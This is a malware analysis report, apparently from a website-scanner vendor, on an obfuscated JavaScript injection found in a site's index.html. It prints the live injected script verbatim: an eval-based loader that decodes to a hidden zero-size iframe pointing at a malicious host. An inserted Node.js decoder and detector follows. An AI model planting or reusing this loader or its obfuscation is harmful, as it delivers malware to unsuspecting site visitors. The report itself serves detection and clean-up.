Obfuscated malicious JavaScript code combined with GA code
Background
Online Website Malware Scanner identified a malicious JavaScript injection in the scanned website. The obfuscated JavaScript comes right after the valid Google Analytics (GA) code and is placed in index.html.
One might assume that the GA code was embedded by the attacker as well, to monitor the success of the campaign. However, this might be a simple coincidence. Interestingly, the website is already in Google's blacklist database. Below you will find the payload analysis and the threat dump.
Malicious action
Hidden, malicious iframes are often used to distribute malware hosted on external web resources (websites): the victim's page silently loads the attacker's page, so whatever is served there runs in the visitor's browser.
Website malware scanner report
Submission date: Thu Nov 28 14:18:42 2013
Infected website's files: 1
[Screenshot: Online Website Malware Scanner sitescan overview]
Malware entry
Beautified script
<script>var wsqWQBPps="cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2fcNRoPJdqz76cNRoPJdqz6ccNRoPJdqz71cNRoPJdqz73cNRoPJdqz72cNRoPJdqz79cNRoPJdqz79cNRoPJdqz61cNRoPJdqz63cNRoPJdqz72cNRoPJdqz2ecNRoPJdqz70cNRoPJdqz68cNRoPJdqz70cNRoPJdqz3fcNRoPJdqz76cNRoPJdqz61cNRoPJdqz6fcNRoPJdqz77cNRoPJdqz76cNRoPJdqz3dcNRoPJdqz4ecNRoPJdqz48cNRoPJdqz63cNRoPJdqz43cNRoPJdqz71cNRoPJdqz55cNRoPJdqz46cNRoPJdqz53cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz68cNRoPJdqz72cNRoPJdqz79cNRoPJdqz74cNRoPJdqz65cNRoPJdqz77cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz39cNRoPJdqz38cNRoPJdqz38cNRoPJdqz39cNRoPJdqz34cNRoPJdqz33cNRoPJdqz39cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz79cNRoPJdqz6acNRoPJdqz72cNRoPJdqz65cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz38cNRoPJdqz35cNRoPJdqz34cNRoPJdqz22cNRoPJdqz20cNRoPJdqz6ecNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz79cNRoPJdqz66cNRoPJdqz65cNRoPJdqz6acNRoPJdqz43cNRoPJdqz50cNRoPJdqz43cNRoPJdqz7acNRoPJdqz62cNRoPJdqz41cNRoPJdqz22cNRoPJdqz20cNRoPJdqz74cNRoPJdqz69cNRoPJdqz74cNRoPJdqz6ccNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz4ecNRoPJdqz65cNRoPJdqz73cNRoPJdqz58cNRoPJdqz6fcNRoPJdqz59cNRoPJdqz47cNRoPJdqz54cNRoPJdqz42cNRoPJdqz7acNRoPJdqz22cNRoPJdqz20cNRoPJdqz77cNRoPJdqz69cNRoPJdqz64cNRoPJdqz74cNRoPJdqz68cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz68cNRoPJdqz65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e"; yvDFQwwmM = eval; var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%");
The string is ordinary percent-encoded HTML in which every "%" has been swapped for the junk token cNRoPJdqz; the script restores the "%" with replace() and passes the result to eval (aliased as yvDFQwwmM) so that no readable URL or tag appears in the source. The decoded payload generates a hidden iframe pointing to the following URL: http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854
Malicious payload
Payload:
<iframe src="http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe>
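As an added example that is not part of the original report, the following Node.js script recovers this kind of payload statically, without running eval: it reads the junk token out of the replace() call, restores the percent-encoding, decodes it and checks the result for a zero-size iframe. The obfuscated sample it runs on is constructed here with the page's token and a non-routable URL, not taken from the infected site.

```javascript
// Static decoder for the "token-for-percent" obfuscation shown above.
// The injected script hides percent-encoded HTML by swapping "%" for a junk
// token, restores "%" with String.replace() and hands the result to eval.
// Decoding it here never executes the sample, so it is safe to run on a dump.

const TOKEN = "cNRoPJdqz"; // token used by the sample on this page

// Constructed sample: the same scheme applied to a non-routable URL.
const SAMPLE_PAYLOAD =
  '<iframe src="http://example.invalid/a.php" width="0" height="0"></iframe>';
function obfuscate(text, token) {
  // Each character becomes TOKEN + two hex digits, i.e. "%XX" with "%" swapped.
  return Array.from(text, c =>
    token + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}
const SAMPLE_SCRIPT =
  `var q="${obfuscate(SAMPLE_PAYLOAD, TOKEN)}";` +
  `f=eval;var r=q.replace(/${TOKEN}/g,"%");f(unescape(r));`;

// Recover the token from the tell-tale .replace(/<token>/g, "%") call.
function findToken(script) {
  const m = /\.replace\(\/([A-Za-z0-9_]+)\/g\s*,\s*["']%["']\)/.exec(script);
  return m ? m[1] : null;
}

// Locate the long token+hex string literal and decode it without eval.
function decodeObfuscated(script) {
  const token = findToken(script);
  if (!token) return null;
  const lit = new RegExp(`["']((?:${token}[0-9a-fA-F]{2})+)["']`).exec(script);
  if (!lit) return null;
  // split() leaves a leading "" so the joined string starts with "%".
  return decodeURIComponent(lit[1].split(token).join("%"));
}

// Pull the destination the victim's browser would be sent to.
function extractIframeSrc(html) {
  const m = /<iframe[^>]*\ssrc=["']([^"']+)["']/i.exec(html);
  return m ? m[1] : null;
}

// A zero-size frame carries no content for the visitor; it is a loader.
function isHiddenIframe(html) {
  return /<iframe[^>]*\swidth=["']0["'][^>]*\sheight=["']0["']/i.test(html);
}

const decoded = decodeObfuscated(SAMPLE_SCRIPT);
console.log("token:", findToken(SAMPLE_SCRIPT));
console.log("hidden iframe:", isHiddenIframe(decoded), "->", extractIframeSrc(decoded));
```

Running the same functions over the real dump above yields the iframe listed under "Payload:"; the decoded HTML can then be matched against the page files and the src host added to blocklists or detection rules.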
Blacklisting status
The website is Suspicious on Google Safe Browsing.
The VirusTotal URL scan reports that 8 of 51 antivirus and malware detection engines identified the redirect IP as a malicious site.
[Screenshot: VirusTotal URL scan report]
Malware clean-up
Uncovering online threats and hidden malware is easy and effective with Online Malware Scanner. However, if you suspect that your website was infected, use Website Anti-malware Monitoring for malware removal. Alternatively, you can try to remove the malware yourself using Quttera's website scan report. You will then need to submit your website(s) for re-testing and for removal from the blacklist.